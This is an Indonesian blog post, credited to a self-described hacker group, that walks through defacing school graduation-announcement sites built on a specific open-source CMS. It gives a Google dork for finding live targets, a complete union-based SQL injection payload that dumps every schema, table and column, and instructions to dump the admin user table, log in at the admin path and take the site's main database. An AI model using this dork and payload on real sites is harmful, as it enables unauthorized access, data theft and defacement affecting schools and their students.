Ads

Monday, June 17, 2019


Deface Metode SQL Injection CMS Kelulusan
Date : 16 Juni 2019
Author : Ulin + Endang
Garuda Security hacker
CMS github :https://github.com/slametbsan/kelulusan/
Vuln : SQL
######################
Dork :
intext:"Masukkan nomor ujianmu pada form yang disediakan"
Masukin Dios di form yang ada
' union select (select (@) from (select(@:=0x00),(select (@) from (information_schema.columns) where (table_schema>=@) and (@)in (@:=concat(@,0x3C,0x62,0x72,0x3E,' [ ',table_schema,' ] > ',table_name,' > ',column_name))))a),2,3,4,5,6,7,8-- -
(@⁨Ulin⁩ yang bikin diosnya, karena w noob SQL Injection manual)
Maka akan muncul database nya
Selanjutnya silakan dump manual sendiri gan.
Dump : un_user
Login : site/path/admin
Kalo ada database utama webnya yah dump ajah sekalian
And enjoys

Source? https://www.postekno.net

- Copyright © Learning Tech - Blogger Templates - Powered by Blogger - Designed by Johanes Djogan -